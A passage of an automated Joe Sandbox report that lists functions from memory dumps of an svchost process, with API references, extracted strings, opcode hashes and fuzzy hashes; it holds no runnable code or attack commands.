            • Instruction Fuzzy Hash: FE81AE72A0C78186EB23AF21A44026977E6FB567ECF548635EA5D47BE8DF3CE4048700
            Function 00007FFA4185B7E0 Relevance: 9.2, APIs: 6, Instructions: 161COMMONLIBRARYCODE
            Download Yara Rule
            APIs
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: Name::operator+$NameName::
            • String ID:
            • API String ID: 168861036-0
            • Opcode ID: e53a006d59b0810860a6c96bd9dfa8f1706bd06569171c7c58372043ddc56057
            • Instruction ID: a727cfd6d4b89d12d36a08e51c6eb29303c1c204956b88df189f1043daef0742
            • Opcode Fuzzy Hash: e53a006d59b0810860a6c96bd9dfa8f1706bd06569171c7c58372043ddc56057
            • Instruction Fuzzy Hash: 2E714776A0CA56C9E713AF65D8802BC37B2FBA274CF54C436DA0D676A6DF38A441C700
            Function 00007FFA41850AF0 Relevance: 9.1, APIs: 6, Instructions: 94threadCOMMON
            Download Yara Rule
            APIs
            • GetCurrentThreadId.KERNEL32 ref: 00007FFA41850B41
            • AcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,?,00000000,00007FFA418510D1,?,?,?,00007FFA41835F97), ref: 00007FFA41850B60
            • AcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,?,00000000,00007FFA418510D1,?,?,?,00007FFA41835F97), ref: 00007FFA41850B82
            • sys_get_time.LIBCPMT ref: 00007FFA41850B9D
            • TryAcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,?,00000000,00007FFA418510D1,?,?,?,00007FFA41835F97), ref: 00007FFA41850BC3
            • TryAcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,?,00000000,00007FFA418510D1,?,?,?,00007FFA41835F97), ref: 00007FFA41850BDB
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: AcquireExclusiveLock$CurrentThreadsys_get_time
            • String ID:
            • API String ID: 184115430-0
            • Opcode ID: a5dcb476a3c6372a5171e02a7f607da40a5a6dc068e1aefeb27102f88af64898
            • Instruction ID: 43f1db31f0ea8b85b9ccdf310b231bc23215a1658469c538b347dd18481335e2
            • Opcode Fuzzy Hash: a5dcb476a3c6372a5171e02a7f607da40a5a6dc068e1aefeb27102f88af64898
            • Instruction Fuzzy Hash: 0E411B32A1C64686EB67AF14E58023973A0FB56B9CF508531D68D43AA8DF3CF895CB01
            Function 00007FFA417CB500 Relevance: 9.1, APIs: 6, Instructions: 90COMMON
            Download Yara Rule
            APIs
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
            • String ID:
            • API String ID: 2081738530-0
            • Opcode ID: 5911472bb8f59b52f0190a8fedaa5ec63bbbb8d44c55f01b264dd8432d1a2f84
            • Instruction ID: 0baa7f02110688adf55b898bffe43dfd292b961a6b965e2ce3983bfc3147738c
            • Opcode Fuzzy Hash: 5911472bb8f59b52f0190a8fedaa5ec63bbbb8d44c55f01b264dd8432d1a2f84
            • Instruction Fuzzy Hash: 96316426A0CA0185EB23BB15E5401796370FB997D8F588231EA4D576B6EF3CE502C704
            Function 00007FFA417CA820 Relevance: 9.1, APIs: 6, Instructions: 90COMMON
            Download Yara Rule
            APIs
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
            • String ID:
            • API String ID: 2081738530-0
            • Opcode ID: 4254e108433b0d90c776975f56c716995d53cdfc68408abd27f44780c455c1d6
            • Instruction ID: 97a0a3eff7c53fa41c0ec2300bcdacadf489495d8d0a78fd739448d561f38714
            • Opcode Fuzzy Hash: 4254e108433b0d90c776975f56c716995d53cdfc68408abd27f44780c455c1d6
            • Instruction Fuzzy Hash: 35316426A0CA0285EB23BB25E5501BA73B0FB95798F588231DA5D576B6EF3CE542C700
            Function 00007FFA417E6A10 Relevance: 9.1, APIs: 6, Instructions: 90COMMON
            Download Yara Rule
            APIs
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
            • String ID:
            • API String ID: 2081738530-0
            • Opcode ID: 5bef54776d1d6a7d04912b4ff1b063a56a4363d8985f7778fad5e25352c1f86d
            • Instruction ID: 538c3b0870a50f134b5fca0e73e31ef9e86ff8e124d3ee74a53f0ce9e6d154d0
            • Opcode Fuzzy Hash: 5bef54776d1d6a7d04912b4ff1b063a56a4363d8985f7778fad5e25352c1f86d
            • Instruction Fuzzy Hash: 52315126B0CB0191EB63BB25E58057973B0EF96B98F588231EA4D572B6DE3CE541C700
            Function 00007FFA417C8E70 Relevance: 9.1, APIs: 6, Instructions: 90COMMON
            Download Yara Rule
            APIs
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
            • String ID:
            • API String ID: 2081738530-0
            • Opcode ID: ed7826a3d437ee5973b216f76735c2cc113e43e56a1f1de425c106e7a48a8bcd
            • Instruction ID: 92cd242450a783fdf0840156a6be217b57ef074ff92102975e1e56d59fe4a8d6
            • Opcode Fuzzy Hash: ed7826a3d437ee5973b216f76735c2cc113e43e56a1f1de425c106e7a48a8bcd
            • Instruction Fuzzy Hash: 57315526A0CA0281FB27FB25E5401797371EB96798F588231EA4D576B6EF3CF442C704
            Function 6828BC10 Relevance: 9.1, APIs: 6, Instructions: 75COMMON
            Download Yara Rule
            APIs
            Memory Dump Source
            • Source File: 0000002E.00000002.2337881551.0000000068281000.00000020.00000001.01000000.00000019.sdmp, Offset: 68280000, based on PE: true
            • Associated: 0000002E.00000002.2337800612.0000000068280000.00000002.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2338814328.0000000068296000.00000004.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2338878664.0000000068297000.00000002.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2339257856.00000000682A0000.00000002.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2339331155.00000000682A1000.00000004.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2339387487.00000000682A4000.00000008.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2339424514.00000000682A5000.00000002.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2339424514.00000000682EC000.00000002.00000001.01000000.00000019.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_68280000_svchost.jbxd
            Similarity
            • API ID: free$_vsnwprintfmemcpywcschr
            • String ID:
            • API String ID: 1058213626-0
            • Opcode ID: ff6fad4c833719cb0e07a9023827865d875ff651630cd3a060bd56943facb6f4
            • Instruction ID: 3f2296d8db74d968cc61e6d4f80ecfc3a21ac720ff4b09df08dd94e69643891b
            • Opcode Fuzzy Hash: ff6fad4c833719cb0e07a9023827865d875ff651630cd3a060bd56943facb6f4
            • Instruction Fuzzy Hash: 0D11D56770568988ED058F6BE9002999350AB88BF9FC846359F6D47BE4EE7CC4DA8300
            Function 00007FFA41872C40 Relevance: 9.1, APIs: 6, Instructions: 51COMMONLIBRARYCODE
            Download Yara Rule
            APIs
            • GetLastError.KERNEL32 ref: 00007FFA41872C4F
            • SetLastError.KERNEL32 ref: 00007FFA41872C6E
            • FlsSetValue.KERNEL32 ref: 00007FFA41872C97
            • FlsSetValue.KERNEL32 ref: 00007FFA41872CA8
            • FlsSetValue.KERNEL32 ref: 00007FFA41872CB9
              • Part of subcall function 00007FFA41872870: HeapFree.KERNEL32(?,?,0E10AC2583480000,00007FFA4188076A,?,?,?,00007FFA41880AE7,?,?,00000000,00007FFA4187F891,?,?,00007FFA4187253A,00007FFA4187F7C3), ref: 00007FFA41872886
              • Part of subcall function 00007FFA41872870: GetLastError.KERNEL32(?,?,0E10AC2583480000,00007FFA4188076A,?,?,?,00007FFA41880AE7,?,?,00000000,00007FFA4187F891,?,?,00007FFA4187253A,00007FFA4187F7C3), ref: 00007FFA41872890
            • SetLastError.KERNEL32 ref: 00007FFA41872CDC
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: ErrorLast$Value$FreeHeap
            • String ID:
            • API String ID: 365477584-0
            • Opcode ID: 4b721cf7f32bfc8f33830826c8a682e1831b8daebe534e27f8f118be69a3d166
            • Instruction ID: 2651aecf12eda8b9f5084fea99bbe3f8a765f15e27fb3833975b61c420d6226f
            • Opcode Fuzzy Hash: 4b721cf7f32bfc8f33830826c8a682e1831b8daebe534e27f8f118be69a3d166
            • Instruction Fuzzy Hash: AC112B20F0C28341FB67B761AD5117A6293AF8ABD0F18D635E97E463F6DE2CF4414200
            Function 68285DB0 Relevance: 9.0, APIs: 6, Instructions: 48COMMON
            Download Yara Rule
            APIs
            • pthread_mutexattr_init.LIBWINPTHREAD-1 ref: 68285DC2
            • pthread_mutexattr_settype.LIBWINPTHREAD-1 ref: 68285DE8
            • pthread_mutex_init.LIBWINPTHREAD-1 ref: 68285DFA
            • pthread_mutexattr_destroy.LIBWINPTHREAD-1 ref: 68285E09
            Memory Dump Source
            • Source File: 0000002E.00000002.2337881551.0000000068281000.00000020.00000001.01000000.00000019.sdmp, Offset: 68280000, based on PE: true
            • Associated: 0000002E.00000002.2337800612.0000000068280000.00000002.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2338814328.0000000068296000.00000004.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2338878664.0000000068297000.00000002.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2339257856.00000000682A0000.00000002.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2339331155.00000000682A1000.00000004.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2339387487.00000000682A4000.00000008.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2339424514.00000000682A5000.00000002.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2339424514.00000000682EC000.00000002.00000001.01000000.00000019.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_68280000_svchost.jbxd
            Similarity
            • API ID: pthread_mutex_initpthread_mutexattr_destroypthread_mutexattr_initpthread_mutexattr_settype
            • String ID:
            • API String ID: 3045616983-0
            • Opcode ID: 30fdcc7eac7baab35a635dcd2ae8769bd41f1f5ce2e5b37ad019a28fda06dcd5
            • Instruction ID: af2adbcbe8b8ebdd27bc45541cf758786fc65d9683058138e7abc058df1f117a
            • Opcode Fuzzy Hash: 30fdcc7eac7baab35a635dcd2ae8769bd41f1f5ce2e5b37ad019a28fda06dcd5
            • Instruction Fuzzy Hash: 42F0A46571812197FB095B69FD5876982919B48FF1F805230DD17837A4EF2C89DF8310
            Function 00007FFA417D6481 Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 255COMMON
            Download Yara Rule
            APIs
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: _invalid_parameter_noinfo_noreturn
            • String ID: Connection is not open.$SELECT * FROM report_process_table$_name
            • API String ID: 3668304517-2728671282
            • Opcode ID: d6479aa5d7aa2e6004724aa88ccc360f0d077392b6f4d0dea6e329a000b699d8
            • Instruction ID: bf138f4a078ed4ce7aadad83388de50fbc80e17bb3960b8596424d01a0b895c4
            • Opcode Fuzzy Hash: d6479aa5d7aa2e6004724aa88ccc360f0d077392b6f4d0dea6e329a000b699d8
            • Instruction Fuzzy Hash: 61C1D432A18B858AEB02DF74D4802ED7370FB96758F509635FA4D53A6AEF78E580C740
            Function 00007FFA417E7DC0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 197COMMON
            Download Yara Rule
            APIs
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: _invalid_parameter_noinfo_noreturn
            • String ID: " not used$AlgorithmParametersBase: parameter "
            • API String ID: 3668304517-612349224
            • Opcode ID: 28a1011f840e176a027720b407d7dabb115d431d9d7b0cee128d5c3a10eba2e2
            • Instruction ID: bf0d493afbed44370956b9c62cee18cd48a3e95250d0e97e7bc6bc9585388a2c
            • Opcode Fuzzy Hash: 28a1011f840e176a027720b407d7dabb115d431d9d7b0cee128d5c3a10eba2e2
            • Instruction Fuzzy Hash: EF81B762A1CB8581EB12DB29D44036D6361FBA6B94F609331EA9C037E6EF7CE5D1C740
            Function 00007FFA417E4BF0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 192COMMON
            Download Yara Rule
            APIs
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: _invalid_parameter_noinfo_noreturn$DirectoryWindows
            • String ID: C:\
            • API String ID: 2156477447-3404278061
            • Opcode ID: 971959fb4b5d2da89344b576cd7db73d891f96c29104e5f9601c40ecd9757238
            • Instruction ID: d3d68ca29e1b0dd923a67e946cc466268598d9a9401afb4eb512cc736432de32
            • Opcode Fuzzy Hash: 971959fb4b5d2da89344b576cd7db73d891f96c29104e5f9601c40ecd9757238
            • Instruction Fuzzy Hash: 5E81C762A1C78581EB52EB15E44477D63A1EB867D4F508231D79D83AF6EF7CE0C08B04
            Function 00007FFA417EEA30 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 190COMMON
            Download Yara Rule
            APIs
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: _invalid_parameter_noinfo_noreturn$DirectoryWindows
            • String ID: C:\
            • API String ID: 2156477447-3404278061
            • Opcode ID: 6535b9b13a8b0fd081d3cb14b3e7591e8731ffa1f73e271d1ddc0a5ecad5c2d9
            • Instruction ID: 2c18b8ab6d4fc531bf17b2fbd773902dad0ded1cde40bc1c575a445536616b76
            • Opcode Fuzzy Hash: 6535b9b13a8b0fd081d3cb14b3e7591e8731ffa1f73e271d1ddc0a5ecad5c2d9
            • Instruction Fuzzy Hash: 7681E962B0C78181EF52AB65E48476D63A1EB867D0F508631D69D42BFAEF7CE080CB04
            Function 00007FFA417D8EC0 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 185COMMON
            Download Yara Rule
            APIs
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: _invalid_parameter_noinfo_noreturn
            • String ID: Hex string has an odd length.$invalid stoi argument$stoi argument out of range
            • API String ID: 3668304517-2380746493
            • Opcode ID: d4152a1ae966f18a4a6471761336e70becba1bfb537fbeb3e74ac44b29f3d468
            • Instruction ID: 720be0a79fa3e60708a8a756df650968be10ecdb117a0ec33ed318931a110220
            • Opcode Fuzzy Hash: d4152a1ae966f18a4a6471761336e70becba1bfb537fbeb3e74ac44b29f3d468
            • Instruction Fuzzy Hash: C561DF22B08A4A95EB13EB75E8403BD2371BB06B98F548532DE5D07BA6DF3CE485C744
            Function 00007FFA4185CF0C Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 167COMMONLIBRARYCODE
            Download Yara Rule
            APIs
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: Name::operator+
            • String ID: std::nullptr_t$std::nullptr_t $volatile$volatile
            • API String ID: 2943138195-757766384
            • Opcode ID: fe1fa46dc803daf998cfa2a68e4382175e2fae7587f1ccdbe46755bbdb536e15
            • Instruction ID: a60bf1cb74a13420f9565ef5c902bc04f8e21f4ec5d3142ea7da0c8fc211ced9
            • Opcode Fuzzy Hash: fe1fa46dc803daf998cfa2a68e4382175e2fae7587f1ccdbe46755bbdb536e15
            • Instruction Fuzzy Hash: 40712766A0CB4288FB17AF2598501B877A5FB16788F84C635DE4E56AB5DF3CF1608700
            Function 00007FFA4185EB28 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 89COMMONLIBRARYCODE
            Download Yara Rule
            APIs
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: NameName::
            • String ID: `template-parameter$void
            • API String ID: 1333004437-4057429177
            • Opcode ID: a38152fa0011f94e66771c8c4ecaca1c5a3766b603fa5058f5929ad690054168
            • Instruction ID: 8d907a81183b53e84a34a91233eefb3e778b1e013834449860f6f7de80d69c68
            • Opcode Fuzzy Hash: a38152fa0011f94e66771c8c4ecaca1c5a3766b603fa5058f5929ad690054168
            • Instruction Fuzzy Hash: EE414822F1CB5688FB03AFA1D8502FD23B1BB0A788F948136DE0D67665DF78E4458340
            Function 68287EA0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 25COMMON
            Download Yara Rule
            APIs
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2337881551.0000000068281000.00000020.00000001.01000000.00000019.sdmp, Offset: 68280000, based on PE: true
            • Associated: 0000002E.00000002.2337800612.0000000068280000.00000002.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2338814328.0000000068296000.00000004.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2338878664.0000000068297000.00000002.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2339257856.00000000682A0000.00000002.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2339331155.00000000682A1000.00000004.00000001.01000000.00000019.sdmpDownload File
